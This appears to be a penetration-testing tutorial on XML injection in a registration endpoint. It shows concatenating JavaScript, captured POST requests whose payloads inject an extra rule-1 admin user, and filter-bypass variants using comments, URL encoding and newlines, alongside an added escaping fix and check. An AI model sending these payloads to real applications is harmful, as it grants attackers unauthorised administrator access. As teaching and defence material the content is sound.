Insert XML payloads such as `<test>` into each parameter until you receive an XML error such as:

```
XML declaration allowed only at the start of the document
```
Now look for ways to learn the XML structure the application builds (for example from its JS files), so that payloads can be shaped to fit it.
```javascript
function WSregister__old() {
    var name = document.getElementById("name").value;
    var username = document.getElementById("user").value;
    var password = document.getElementById("password").value;

    // The XML is built by string concatenation: the field values land
    // directly inside the tags, so any markup in them becomes part of the document.
    var xml = '<?xml version="1.0" encoding="utf-8"?> ';
    xml += '<user> ';
    xml += ' <rule>2</rule> ';
    xml += ' <name>' + name + '</name> ';
    xml += ' <username>' + username + '</username> ';
    xml += ' <password>' + password + '</password> ';
    xml += '</user> ';

    $.ajax({
        // ... request options truncated on the original page
    });
}
```
Capture a request and modify the parameter to inject a new user with "rule 1" and see if you can elevate your account.
```http
POST /add_new.php HTTP/1.1
Host: Vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 109
Connection: close

name=user1&user=user1</username></user><user><rule>1</rule><name>admin</name><username>admin&password=password
```
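As an added example (not code from the original page), the concatenating builder is shown beside an escaping version and both are fed the decoded body of the request above, so the effect of the injected rule-1 user can be compared; the function names and the `countUsers` check are assumptions for illustration.

```javascript
// Added example, not from the original page; function names are assumptions.
// Vulnerable pattern from the page: raw field values concatenated into the markup.
function buildUserXmlUnsafe(fields) {
  let xml = '<?xml version="1.0" encoding="utf-8"?><user><rule>2</rule>';
  xml += '<name>' + fields.name + '</name>';
  xml += '<username>' + fields.user + '</username>';
  xml += '<password>' + fields.password + '</password>';
  return xml + '</user>';
}

// Fix: replace the characters that carry meaning in XML text with entity
// references so input can never open or close a tag. A deny-list of tag names
// is not a fix; the page shows it bypassed with case changes and whitespace.
function escapeXml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&apos;');
}

function buildUserXmlSafe(fields) {
  let xml = '<?xml version="1.0" encoding="utf-8"?><user><rule>2</rule>';
  xml += '<name>' + escapeXml(fields.name) + '</name>';
  xml += '<username>' + escapeXml(fields.user) + '</username>';
  xml += '<password>' + escapeXml(fields.password) + '</password>';
  return xml + '</user>';
}

// Server-side sanity check: count <user> start tags. Whitespace, including a
// newline, is allowed before '>' so the newline variant from the page is counted.
function countUsers(xml) {
  const matches = xml.match(/<user\s*>/gi);
  return matches ? matches.length : 0;
}

// Constructed sample input: the decoded body of the first captured request.
const injected = {
  name: 'user1',
  user: 'user1</username></user><user><rule>1</rule><name>admin</name><username>admin',
  password: 'password',
};

console.log(countUsers(buildUserXmlUnsafe(injected))); // 2: a second, rule-1 user
console.log(countUsers(buildUserXmlSafe(injected)));   // 1: payload is inert text
```

A server that rejects a registration document with more than one `<user>` element, or that simply escapes the fields, makes the captured payload inert.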
If the application strips some of the characters, consider a double injection and URL-encoding the payload, or try submitting it through the application's own form instead.
```
name: </name></user><user><rule>1<!--
username: --></rule><name>admin1</name><username>admin1
password: pentest
```
```http
POST /add_new.php HTTP/1.1
Host: vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Connection: close

name=%3C%2Fname%3E%3C%2Fuser%3E%3Cuser%3E%3Crule%3E1%3C!--&user=--%3E%3C%2Frule%3E%3Cname%3Ea%3C%2Fname%3E%3Cusername%3Ea&password=pentest
```
The filter may be case-insensitive, and it also appears to ignore spaces and tabs between the tag name and the closing `>` character; a newline in that position, however, is not filtered.
Try adding new lines to see if they still work:
```http
POST /add_new.php HTTP/1.1
Host: vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: vulnerable.host
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 84
Connection: close

name=</name></user><user><rule>1<!--&user=--></rule><username>l33t&password=1337
```